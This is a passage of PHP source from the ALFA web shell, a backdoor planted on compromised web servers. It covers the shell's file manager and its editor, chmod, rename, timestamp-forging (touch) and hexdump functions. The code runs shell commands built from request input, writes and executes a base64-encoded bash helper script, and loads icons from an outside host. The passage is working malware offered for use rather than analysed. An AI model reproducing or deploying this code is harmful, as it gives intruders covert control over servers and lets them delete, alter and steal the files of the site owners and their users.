  3106. if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
  3107. deleteDir(rawurldecode(@$_POST['alfa2']));
  3108. alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
  3109. }else{
  3110. @unlink(rawurldecode(@$_POST['alfa2']));
  3111. }
  3112. if(isset($GLOBALS["glob_chdir_false"])){
  3113. $source = rawurldecode(@$_POST['alfa2']);
  3114. if($source!='..'&&!empty($source)){
  3115. if(_alfa_can_runCommand(true,true)){
  3116. alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
  3117. }
  3118. }
  3119. }
  3120. break;
  3121. case 'paste':
  3122. if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){
  3123. function copy_paste($c,$s,$d){
  3124. if(@is_dir($c.$s)){
  3125. @mkdir($d.$s);
  3126. $h = @opendir($c.$s);
  3127. while (($f = @readdir($h)) !== false)
  3128. if (($f != ".") and ($f != ".."))
  3129. copy_paste($c.$s.'/',$f, $d.$s.'/');
  3130. } elseif(is_file($c.$s))
  3131. @copy($c.$s, $d.$s);
  3132. }
  3133. foreach($_SESSION['f'] as $f)
  3134. copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
  3135. }elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){
  3136. function move_paste($c,$s,$d){
  3137. if(@is_dir($c.$s)){
  3138. @mkdir($d.$s);
  3139. $h = @opendir($c.$s);
  3140. while (($f = @readdir($h)) !== false)
  3141. if(($f != ".") and ($f != ".."))
  3142. copy_paste($c.$s.'/',$f, $d.$s.'/');
  3143. }elseif(@is_file($c.$s))
  3144. @copy($c.$s, $d.$s);
  3145. }
  3146. foreach($_SESSION['f'] as $f)
  3147. @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
  3148. }elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){
  3149. if(class_exists('ZipArchive')){
  3150. $zip = new ZipArchive();
  3151. $zipX = "alfa_".rand(1,1000).".zip";
  3152. if($zip->open($zipX, 1)){
  3153. @chdir($_SESSION['c']);
  3154. foreach($_SESSION['f'] as $f){
  3155. if($f == '..')continue;
  3156. if(@is_file($_SESSION['c'].$f))
  3157. $zip->addFile($_SESSION['c'].$f, $f);
  3158. elseif(@is_dir($_SESSION['c'].$f)){
  3159. $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
  3160. foreach($iterator as $key=>$value){
  3161. $key = str_replace('\\','/',realpath($key));
  3162. if(@is_dir($key)){
  3163. if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
  3164. }else{$zip->addFile($key,$key);}}}}
  3165. @chdir($GLOBALS['cwd']);
  3166. $zip->close();
  3167. __alert('>> '.$zipX.' << is created...');}}
  3168. }elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){
  3169. if(class_exists('ZipArchive')){
  3170. $zip = new ZipArchive();
  3171. foreach($_SESSION['f'] as $f) {
  3172. if($zip->open($_SESSION['c'].$f)){
  3173. $zip->extractTo($GLOBALS['cwd']);
  3174. $zip->close();}}}}
  3175. unset($_SESSION['f']);
  3176. break;
  3177. default:
  3178. if(!empty($_POST['alfa1'])){
  3179. $_SESSION['act'] = @$_POST['alfa1'];
  3180. $_SESSION['f'] = @$_POST['f'];
  3181. $_SESSION['c'] = @$_POST['c'];
  3182. }
  3183. break;
  3184. }
  3185. }
  3186. if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ''){
  3187. $dirContent = @scandir($_SESSION[__LAST_CWD__]);
  3188. }else{
  3189. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  3190. if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
  3191. $path = explode('/', $res[1]);
  3192. array_pop($path);
  3193. $_POST['c'] = implode('/', $path);
  3194. }
  3195. $_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST['c']);
  3196. }
  3197. $cmd_dir = false;
  3198. if($dirContent === false){
  3199. if(_alfa_can_runCommand(true,true)){
  3200. @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  3201. if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){
  3202. $bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";
  3203. alfaWriteTocgiapi("getdir.alfa",$bash);
  3204. }
  3205. if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/";
  3206. $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '".addslashes($_SESSION[__LAST_CWD__])."'");
  3207. $dirContent = json_decode($dirContent, true);
  3208. if(is_array($dirContent)){
  3209. array_pop($dirContent);
  3210. $cmd_dir = true;
  3211. }else{
  3212. $dirContent = false;
  3213. }
  3214. $_SESSION["alfachdir_bash"] = true;
  3215. }
  3216. }
  3217. if($dirContent == false){
  3218. echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
  3219. alfaFooter();
  3220. return;
  3221. }
  3222. global $sort;
  3223. $sort = array('name', 1);
  3224. if(!empty($_POST['alfa1'])) {
  3225. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
  3226. $sort = array($match[1], (int)$match[2]);
  3227. }
  3228. echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
  3229. $dirs = $files = array();
  3230. $n = count($dirContent);
  3231. for($i=0;$i<$n;$i++){
  3232. if($cmd_dir){
  3233. $filename = $dirContent[$i]["name"];
  3234. $file_owner = $dirContent[$i]["owner"];
  3235. $file_group = $dirContent[$i]["group"];
  3236. $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
  3237. $file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
  3238. $file_size = $dirContent[$i]["size"];
  3239. $file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"];
  3240. }else{
  3241. $filename = $dirContent[$i];
  3242. $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
  3243. $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
  3244. $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
  3245. $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
  3246. $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
  3247. $file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
  3248. $file_size = @filesize($GLOBALS['cwd'].$filename);
  3249. $file_path = $GLOBALS['cwd'].$filename;
  3250. }
  3251. $tmp = array('name' => $filename,
  3252. 'path' => $file_path,
  3253. 'modify' => $file_modify,
  3254. 'perms' => $file_perm,
  3255. 'size' => $file_size,
  3256. 'owner' => $file_owner,
  3257. 'group' => $file_group
  3258. );
  3259. if(!$cmd_dir){
  3260. if(@is_file($file_path))
  3261. $files[] = array_merge($tmp, array('type' => 'file'));
  3262. elseif(@is_link($file_path))
  3263. $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
  3264. elseif(@is_dir($file_path)&& ($filename != "."))
  3265. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  3266. }else{
  3267. if($dirContent[$i]["type"]=="file"){
  3268. $files[] = array_merge($tmp, array('type' => 'file'));
  3269. }else{
  3270. if($dirContent[$i]["name"] != "."){
  3271. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  3272. }
  3273. }
  3274. }
  3275. }
  3276. $GLOBALS['sort'] = $sort;
  3277. function alfaCmp($a, $b) {
  3278. if($GLOBALS['sort'][0] != 'size')
  3279. return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
  3280. else
  3281. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  3282. }
  3283. usort($files, "alfaCmp");
  3284. usort($dirs, "alfaCmp");
  3285. $files = array_merge($dirs, $files);
  3286. $l=0;
  3287. $cc=0;
  3288. foreach($files as $f){
  3289. $f['name'] = htmlspecialchars($f['name']);
  3290. $newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
  3291. $checkbox = 'checkbox'.$cc;
  3292. $raw_name = rawurlencode($f['name']);
  3293. $icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
  3294. $style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
  3295. echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a class="main_name" href=javascript:void(0) onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
  3296. $f['perms'].'</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
  3297. $l = $l?0:1;
  3298. $cc++;
  3299. }
  3300. echo "<tr><td colspan=7>
  3301. <input type=hidden name=a value='FilesMan'>
  3302. <input type=hidden name=c value='".htmlspecialchars((isset($GLOBALS['glob_chdir_false'])?$_POST['c']:$GLOBALS['cwd']))."'>
  3303. <input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
  3304. <select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
  3305. <input type='submit' value=' '>
  3306. </form></table></div></div>";
  3307. alfafooter();
  3308. }
  3309. function alfaFilesTools(){
  3310. alfahead();
  3311. echo '<div class="filestools">';
  3312. if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
  3313. $alfa1_decoded = $_POST['alfa1'];
  3314. $chdir_fals = false;
  3315. if(!@chdir($_POST['c'])){
  3316. $chdir_fals = true;
  3317. $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
  3318. $alfa_canruncmd = _alfa_can_runCommand(true,true);
  3319. if($alfa_canruncmd){
  3320. $slashed_alfa1 = addslashes($_POST['alfa1']);
  3321. $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
  3322. $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
  3323. }
  3324. }
  3325. if($_POST['alfa2'] == 'auto'){
  3326. if(is_array(@getimagesize($_POST['alfa1']))){
  3327. $_POST['alfa2'] = 'image';
  3328. }else{
  3329. $_POST['alfa2'] = 'view';
  3330. if($chdir_fals){
  3331. if($alfa_canruncmd){
  3332. $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
  3333. $mimetype = $mime[1];
  3334. if(!empty($mimetype)){
  3335. if(strstr($mimetype, "image")){
  3336. $_POST['alfa2'] = 'image';
  3337. }
  3338. }
  3339. }
  3340. }
  3341. }
  3342. }
  3343. if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
  3344. if(@$_POST['alfa2'] == 'mkfile'){
  3345. $_POST['alfa1'] = trim($_POST['alfa1']);
  3346. if($chdir_fals&&$alfa_canruncmd){
  3347. if(_alfa_is_writable($_POST["c"])){
  3348. alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
  3349. $_POST['alfa2'] = "edit";
  3350. }
  3351. }
  3352. if(!@file_exists($_POST['alfa1'])){
  3353. $fp = @fopen($_POST['alfa1'], 'w');
  3354. if($fp){
  3355. $_POST['alfa2'] = "edit";
  3356. fclose($fp);
  3357. }
  3358. }else{
  3359. $_POST['alfa2'] = "edit";
  3360. }
  3361. }
  3362. if(!_alfa_file_exists(@$_POST['alfa1'])){
  3363. echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
  3364. alfaFooter();
  3365. return;
  3366. }
  3367. if($chdir_fals){
  3368. $filesize = $file_info[3];
  3369. $uid["name"] = $file_info[1];
  3370. $gid["name"] = $file_info[2];
  3371. $permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
  3372. }else{
  3373. $uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
  3374. $gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
  3375. if(!$uid&&!$gid){
  3376. $uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
  3377. $gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
  3378. }
  3379. $permcolor = alfaPermsColor($_POST['alfa1']);
  3380. $filesize = @filesize($_POST['alfa1']);
  3381. if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
  3382. if(_alfa_can_runCommand()){
  3383. list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
  3384. }
  3385. }
  3386. }
  3387. echo '<span class="editor_file_info_vars">Name:</span> '.htmlspecialchars($alfa1_decoded).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']).'<br><br>';
  3388. if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
  3389. if(!_alfa_is_dir($_POST['alfa1'])){
  3390. $m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
  3391. $ftype = "file";
  3392. }else{
  3393. $m = array('Chmod', 'Rename', 'Touch');
  3394. $ftype = "dir";
  3395. }
  3396. foreach($m as $v)
  3397. echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
  3398. echo '<br><br>';
  3399. switch($_POST['alfa2']){
  3400. case 'view':
  3401. @chdir($_POST['c']);
  3402. echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">';
  3403. echo htmlspecialchars(__read_file($_POST['alfa1']));
  3404. echo '</pre></div></div>';
  3405. break;
  3406. case 'highlight':
  3407. @chdir($_POST['c']);
  3408. if(@is_readable($_POST['alfa1'])){
  3409. echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
  3410. $code = @highlight_file($_POST['alfa1'],true);
  3411. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
  3412. }
  3413. break;
  3414. case 'delete':
  3415. @chdir($_POST['c']);
  3416. if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){
  3417. $deleted = true;
  3418. if(!@unlink($_POST['alfa1'])){
  3419. $deleted = false;
  3420. if($alfa_canruncmd){
  3421. if(_alfa_is_writable($_POST['alfa1'])){
  3422. alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
  3423. $deleted = true;
  3424. }
  3425. }
  3426. }
  3427. if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
  3428. break;
  3429. case 'chmod':
  3430. @chdir($_POST['c']);
  3431. if(!empty($_POST['alfa3'])){
  3432. $perms = 0;
  3433. for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
  3434. $perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
  3435. if(!@chmod($_POST['alfa1'], $perms)){
  3436. if($chdir_fals&&$alfa_canruncmd){
  3437. alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
  3438. echo('Success!');
  3439. }else{
  3440. echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
  3441. }else{echo('Success!');}
  3442. }
  3443. clearstatcache();
  3444. AlfaNum(8,9,10,7,6,5,4,2,1);
  3445. if($chdir_fals){
  3446. $file_perm = $file_info[5];
  3447. }else{
  3448. $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
  3449. }
  3450. echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
  3451. break;
  3452. case 'edit':
  3453. @chdir($_POST['c']);
  3454. if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
  3455. echo 'File isn\'t writeable';
  3456. break;
  3457. }
  3458. if(!empty($_POST['alfa3'])){
  3459. $_POST['alfa3'] = substr($_POST['alfa3'],1);
  3460. $time = @filemtime($_POST['alfa1']);
  3461. $fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
  3462. if($chdir_fals&&$alfa_canruncmd){
  3463. $rname = $alfa1_decoded;
  3464. $randname = $rname.rand(111,9999);
  3465. $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
  3466. if($fp = @__write_file($filepath ,$_POST['alfa3'])){
  3467. alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
  3468. }
  3469. }
  3470. if($fp){
  3471. echo 'Saved!<br><script>alfa3_="";</script>';
  3472. @touch($_POST['alfa1'],$time,$time);
  3473. }
  3474. }
  3475. echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\''.addslashes($alfa1_decoded).'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
  3476. echo htmlspecialchars(__read_file($_POST['alfa1']));
  3477. echo '</textarea><p><input type="submit" value=" "></p></form>';
  3478. break;
  3479. case 'hexdump':
  3480. @chdir($_POST['c']);
  3481. $c = __read_file($_POST['alfa1']);
  3482. $n = 0;
  3483. $h = array('00000000<br>','','');
  3484. $len = strlen($c);
  3485. for ($i=0; $i<$len; ++$i) {
  3486. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  3487. switch ( ord($c[$i]) ) {
  3488. case 0: $h[2] .= ' '; break;
  3489. case 9: $h[2] .= ' '; break;
  3490. case 10: $h[2] .= ' '; break;
  3491. case 13: $h[2] .= ' '; break;
  3492. default: $h[2] .= $c[$i]; break;
  3493. }
  3494. $n++;
  3495. if ($n == 32) {
  3496. $n = 0;
  3497. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  3498. $h[1] .= '<br>';
  3499. $h[2] .= "\n";
  3500. }
  3501. }
  3502. echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
  3503. break;
  3504. case 'rename':
  3505. @chdir($_POST['c']);
  3506. $alfa1_escape = addslashes($_POST["alfa1"]);
  3507. $alfa3_escape = addslashes($_POST["alfa3"]);
  3508. if(!empty($_POST['alfa3'])){
  3509. $cmd_rename = false;
  3510. if($chdir_fals&&$alfa_canruncmd){
  3511. if(_alfa_is_writable($_POST['alfa1'])){
  3512. $alfa1_escape = addslashes($alfa1_decoded);
  3513. alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
  3514. }else{
  3515. $cmd_rename = true;
  3516. }
  3517. }else{
  3518. $alfa1_escape = addslashes($_POST["alfa1"]);
  3519. }
  3520. if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
  3521. echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";d.files.innerHTML = d.files.innerHTML.replace(/\\\''.$alfa1_escape.'\\\'/g, "\''.$alfa3_escape.'\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"'.$alfa1_escape.'\"/, \'value\=\"'.$alfa3_escape.'\"\');d.files.innerHTML = d.files.innerHTML.replace(/'.$alfa1_escape.'\<\/a\>/g, "'.$alfa3_escape.'</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # '.$alfa1_escape.' # \?/, "Are You Sure For Delete # '.$alfa3_escape.' # ?");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
  3522. }
  3523. echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
  3524. break;
  3525. case 'touch':
  3526. @chdir($_POST['c']);
  3527. if( !empty($_POST['alfa3']) ) {
  3528. $time = strtotime($_POST['alfa3']);
  3529. if($time){
  3530. $touched = false;
  3531. if($chdir_fals&&$alfa_canruncmd){
  3532. alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
  3533. $touched = true;
  3534. }
  3535. if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
  3536. echo 'Fail!';
  3537. else
  3538. echo 'Touched!';
  3539. } else echo 'Bad time format!';
  3540. }
  3541. clearstatcache();
  3542. echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
  3543. break;
  3544. case 'image':
  3545. @chdir($_POST['c']);
  3546. echo('<hr>');
  3547. $file = $_POST['alfa1'];
  3548. $image_info = @getimagesize($file);
  3549. if(is_array($image_info)||$chdir_fals){
  3550. $width = (int)$image_info[0];
  3551. $height = (int)$image_info[1];
  3552. if($chdir_fals&&$alfa_canruncmd){
  3553. $source = alfaEx("cat '".addslashes($file)."' | base64");
  3554. list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
  3555. $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
  3556. $image_info['mime'] = $mime[1];
  3557. }else{
  3558. $source = __ZW5jb2Rlcg(__read_file($file, false));
  3559. }
  3560. $image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
  3561. if($width > 800){$width = 800;}
  3562. echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
  3563. }
  3564. break;
  3565. }
  3566. echo '</div>';
  3567. alfaFooter();
  3568. }
  3569. function findicon($file,$type){
  3570. $s = 'http://solevisible.com/icons/';
  3571. $types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
  3572. if($type!='file'){
  3573. return ($file=='..'?$s.'back.png':$s.'folder.png');
  3574. }else{
  3575. $ext = explode('.',$file);
  3576. $ext = end($ext);
  3577. $ext = strtolower($ext);
